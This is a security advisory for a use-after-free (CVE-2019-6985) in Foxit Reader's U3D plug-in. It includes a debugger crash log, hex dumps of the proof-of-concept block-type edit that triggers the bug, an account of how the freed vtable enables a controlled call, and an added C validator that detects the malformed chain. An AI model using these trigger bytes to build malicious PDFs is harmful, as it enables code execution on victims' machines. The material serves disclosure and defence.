CVE: CVE-2019-6985
Tested Versions:
- Foxit Reader 9.1.0.5096, U3DBrowser.fpi 9.1.0.425
Product URL(s):
Description of the vulnerability
Foxit Reader is a popular PDF reading and printing application. It supports the ECMA-363 standard (Universal 3D File Format) through the U3DBrowser plug-in, which renders 3D annotations embedded in PDF files. Up to version 9.0.1.1049 the plug-in ships in the default installation package; later versions still support it, but the plug-in has to be downloaded separately.
A PDF file that embeds specially crafted 3D content, specifically a malformed 2D Glyph Modifier Block with a particular Chain Index, triggers a use-after-free in which memory under the attacker's control is dereferenced to make a direct virtual call.
(c74.1568): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=14638f80 ebx=66eb6140 ecx=1443afd0 edx=14636fd4 esi=14696fe8 edi=14636fd4
eip=66eb6157 esp=002cd6ac ebp=002cd6b0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
U3DBrowser!PlugInMain+0x18417:
66eb6157 8b01 mov eax,dword ptr [ecx] ds:0023:1443afd0=????????
0:000> u
U3DBrowser!PlugInMain+0x18417:
66eb6157 8b01 mov eax,dword ptr [ecx]
66eb6159 8b00 mov eax,dword ptr [eax]
66eb615b 57 push edi
66eb615c 8b7e08 mov edi,dword ptr [esi+8]
66eb615f 57 push edi
66eb6160 6a00 push 0
66eb6162 ffd0 call eax
66eb6164 56 push esi
0:000> !heap -p -a ecx
address 1443afd0 found in
_DPH_HEAP_ROOT @ bd91000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
143c1784: 1443a000 2000
6d26a1e2 verifier!AVrfDebugPageHeapFree+0x000000c2
76f07809 ntdll!RtlDebugFreeHeap+0x0000002f
76ed4dee ntdll!RtlpFreeHeap+0x00000060
76e8ddf0 ntdll!RtlFreeHeap+0x00000142
7540c8f9 kernel32!HeapFree+0x00000014
6a5c016a MSVCR100!free+0x0000001c
66f91c00 U3DBrowser!PlugInMain+0x000f3ec0
66f9312f U3DBrowser!PlugInMain+0x000f53ef
66f9369a U3DBrowser!PlugInMain+0x000f595a
66f1f979 U3DBrowser!PlugInMain+0x00081c39
66f1faab U3DBrowser!PlugInMain+0x00081d6b
[ ... ]
When processing a crafted PDF whose 3D stream contains a misplaced 2D Glyph Modifier Block (type 0xffffff41) with a specific Chain Index value, an attacker can potentially achieve arbitrary code execution with the privileges of the logged-on user.
Original Model Node Block of type 0xffffff22:
00000510: 00 00 00 00 02 00 00 00 22 ff ff ff 65 00 00 00 ........"...e...
00000520: 00 00 00 00 05 00 42 6f 78 30 34 01 00 00 00 05 ......Box04.....
00000530: 00 42 6f 78 30 33 00 00 80 3f 00 00 00 00 00 00 .Box03...?......
00000540: 00 00 00 00 00 00 00 00 00 00 00 00 80 3f 00 00 .............?..
00000550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000560: 80 3f 00 00 00 00 4b b1 ba c1 44 05 b8 c1 00 00 .?....K...D.....
00000570: 00 00 00 00 80 3f 0d 00 4c 69 67 68 74 42 6f 78 .....?..LightBox
00000580: 4d 6f 64 65 6c 01 00 00 00 00 00 00 45 ff ff ff Model.......E...
PoC: changing the block type to 0xffffff41:
00000510: 00 00 00 00 02 00 00 00 41 ff ff ff 65 00 00 00 ........A...e...
00000520: 00 00 00 00 05 00 42 6f 78 30 34 01 00 00 00 05 ......Box04.....
00000530: 00 42 6f 78 30 33 00 00 80 3f 00 00 00 00 00 00 .Box03...?......
00000540: 00 00 00 00 00 00 00 00 00 00 00 00 80 3f 00 00 .............?..
00000550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000560: 80 3f 00 00 00 00 4b b1 ba c1 44 05 b8 c1 00 00 .?....K...D.....
00000570: 00 00 00 00 80 3f 0d 00 4c 69 67 68 74 42 6f 78 .....?..LightBox
00000580: 4d 6f 64 65 6c 01 00 00 00 00 00 00 45 ff ff ff Model.......E...
Only the Chain Index value 0x1 is required; the following almost completely zeroed 0xffffff41 block reaches the same crash:
00000510: 00 00 00 00 02 00 00 00 41 ff ff ff 65 00 00 00 ........A...e...
00000520: 00 00 00 00 05 00 42 6f 78 30 34 01 00 00 00 01 ......Box04.....
00000530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000570: 00 00 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 ................
00000580: 00 00 00 00 00 00 00 00 00 00 00 00 45 ff ff ff ............E...
At the crash site the referenced object lies entirely within a freed allocation, so an attacker who reclaims that memory controls the virtual table pointer and, through it, the value of eax at the call on .text:10026162:
.text:10026155 mov ecx, [esi]
.text:10026157 mov eax, [ecx] ; Use-after-Free
.text:10026159 mov eax, [eax] ; fetch controlled vtable[0]
.text:1002615B push edi
.text:1002615C mov edi, [esi+8]
.text:1002615F push edi
.text:10026160 push 0
.text:10026162 call eax ; controlled virtual call
The vulnerability is triggered by changing a Model Node Block (0xffffff22) embedded in a Modifier Chain (0xffffff14) into a 2D Glyph Modifier Block (0xffffff41). Under ECMA-363 the Modifier Blocks (0xffffff41 through 0xffffff46) are normally standalone, whereas Modifier Declaration Blocks must be contained in a Modifier Chain Block; the plug-in does not reject a modifier block in the slot where the chain expects a node declaration, and the object it then references has already been freed by the time the virtual call shown above is made.
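The following is an added example written for this page, not code from the advisory or from Foxit: a bounds-checked walker for the ECMA-363 block stream in the hex dumps above. It rebuilds the Model Node Block from the bytes at offset 0x518, applies the PoC edit (block type 0xffffff22 rewritten to 0xffffff41 with the payload left intact), and shows the check a hardened chain parser would apply, namely that the first declaration in a node modifier chain must be a node block. The modifier count 2 is taken from the "02 00 00 00" just before the block in the dump; the empty 0xffffff45 block appended after it is constructed, since the dump cuts the Shading Modifier off, and the node block type range 0xffffff21..0xffffff24 is this example's reading of ECMA-363 rather than something the advisory states.

```c
/* Added example (editor's code, not part of the advisory): bounds-checked
 * U3D block walker, PoC transformation and the first-slot check a hardened
 * modifier chain parser would apply.  Type values other than 0x22, 0x41,
 * 0x45 and the 0x41..0x46 range quoted on the page are assumptions. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define U3D_GROUP_NODE      0xFFFFFF21u  /* first node block type (assumed from ECMA-363) */
#define U3D_MODEL_NODE      0xFFFFFF22u
#define U3D_VIEW_NODE       0xFFFFFF24u  /* last node block type (assumed from ECMA-363) */
#define U3D_GLYPH_MODIFIER  0xFFFFFF41u
#define U3D_CLOD_MODIFIER   0xFFFFFF46u

/* Model Node Block transcribed from the dump, offsets 0x518..0x58b. */
static const uint8_t MODEL_NODE_BLOCK[] = {
    0x22,0xff,0xff,0xff, 0x65,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, /* type, data size, meta size */
    0x05,0x00,'B','o','x','0','4',  0x01,0x00,0x00,0x00,           /* name "Box04", parent count 1 */
    0x05,0x00,'B','o','x','0','3',                                 /* parent name "Box03" */
    0x00,0x00,0x80,0x3f, 0,0,0,0, 0,0,0,0, 0,0,0,0,                /* 4x4 float transform matrix */
    0,0,0,0, 0x00,0x00,0x80,0x3f, 0,0,0,0, 0,0,0,0,
    0,0,0,0, 0,0,0,0, 0x00,0x00,0x80,0x3f, 0,0,0,0,
    0x4b,0xb1,0xba,0xc1, 0x44,0x05,0xb8,0xc1, 0,0,0,0, 0x00,0x00,0x80,0x3f,
    0x0d,0x00,'L','i','g','h','t','B','o','x','M','o','d','e','l', /* model resource name */
    0x01,0x00,0x00,0x00,                                           /* visibility */
    0x00,0x00,0x00                                                 /* pad data to 32-bit boundary */
};

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* On-disk size of the block at p (12-byte header plus data and metadata, each
 * padded to 32 bits), or 0 when the declared sizes exceed the bytes left. */
static size_t block_len(const uint8_t *p, size_t avail) {
    if (avail < 12) return 0;
    uint64_t total = 12 + (((uint64_t)rd32(p + 4) + 3) & ~3ull)
                        + (((uint64_t)rd32(p + 8) + 3) & ~3ull);
    return total <= avail ? (size_t)total : 0;
}

static int is_node_block(uint32_t t)     { return t >= U3D_GROUP_NODE && t <= U3D_VIEW_NODE; }
static int is_modifier_block(uint32_t t) { return t >= U3D_GLYPH_MODIFIER && t <= U3D_CLOD_MODIFIER; }

/* Validate the declaration list of a node modifier chain: a U32 modifier count
 * followed by that many blocks.  Returns 0 when well formed, -1 on truncation,
 * -2 when the first declaration is not a node block (the PoC's shape), -3 when
 * a later declaration is not a modifier block.  *first_type gets the first type. */
int check_node_chain(const uint8_t *buf, size_t len, uint32_t *first_type) {
    if (len < 4) return -1;
    uint32_t count = rd32(buf);
    size_t off = 4;
    for (uint32_t i = 0; i < count; i++) {
        size_t n = block_len(buf + off, len - off);
        if (n == 0) return -1;                       /* sizes run past the buffer */
        uint32_t type = rd32(buf + off);
        if (i == 0) {
            if (first_type) *first_type = type;
            if (!is_node_block(type)) return -2;     /* modifier where the node belongs */
        } else if (!is_modifier_block(type)) {
            return -3;
        }
        off += n;
    }
    return 0;
}

/* Apply the PoC edit: rewrite the first declaration's type from Model Node to
 * 2D Glyph Modifier, leaving the 0x65-byte payload untouched as in the advisory. */
int make_poc(uint8_t *chain, size_t len) {
    if (len < 16 || rd32(chain + 4) != U3D_MODEL_NODE) return -1;
    const uint8_t glyph[4] = {0x41, 0xff, 0xff, 0xff};
    memcpy(chain + 4, glyph, 4);
    return 0;
}

/* Constructed input: modifier count 2, the Model Node Block, then a synthetic
 * empty 0xffffff45 block in place of the truncated Shading Modifier. */
size_t build_chain(uint8_t *out, size_t cap) {
    static const uint8_t count[4] = {0x02, 0, 0, 0};
    static const uint8_t shading[12] = {0x45,0xff,0xff,0xff, 0,0,0,0, 0,0,0,0};
    size_t n = 4 + sizeof MODEL_NODE_BLOCK + sizeof shading;
    if (cap < n) return 0;
    memcpy(out, count, 4);
    memcpy(out + 4, MODEL_NODE_BLOCK, sizeof MODEL_NODE_BLOCK);
    memcpy(out + 4 + sizeof MODEL_NODE_BLOCK, shading, sizeof shading);
    return n;
}

/* Returns 1 only if the original chain validates, the PoC chain is rejected
 * with the first-slot error, and a truncated stream is rejected as well. */
int demo(void) {
    uint8_t buf[160];
    size_t n = build_chain(buf, sizeof buf);
    uint32_t t = 0;
    if (n == 0 || check_node_chain(buf, n, &t) != 0 || t != U3D_MODEL_NODE) return 0;
    if (make_poc(buf, n) != 0) return 0;
    if (check_node_chain(buf, n, &t) != -2 || t != U3D_GLYPH_MODIFIER) return 0;
    if (check_node_chain(buf, 50, &t) != -1) return 0;
    return 1;
}

int main(void) {
    printf("chain check %s\n", demo() ? "behaves as expected" : "FAILED");
    return 0;
}
```

The walker reads the declared data and metadata sizes before trusting them, which is the other check a parser of this format needs: the PoC leaves the 0x65-byte size field in place, so the malformed block is well sized and only the type check catches it.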
Timeline:
- 2018-11-28 Vendor disclosure
- 2019-01-03 Vendor patched
Vendor Response
The vendor has patched the 3D plugin and acknowledged the security issues at https://www.foxitsoftware.com/support/security-bulletins.php.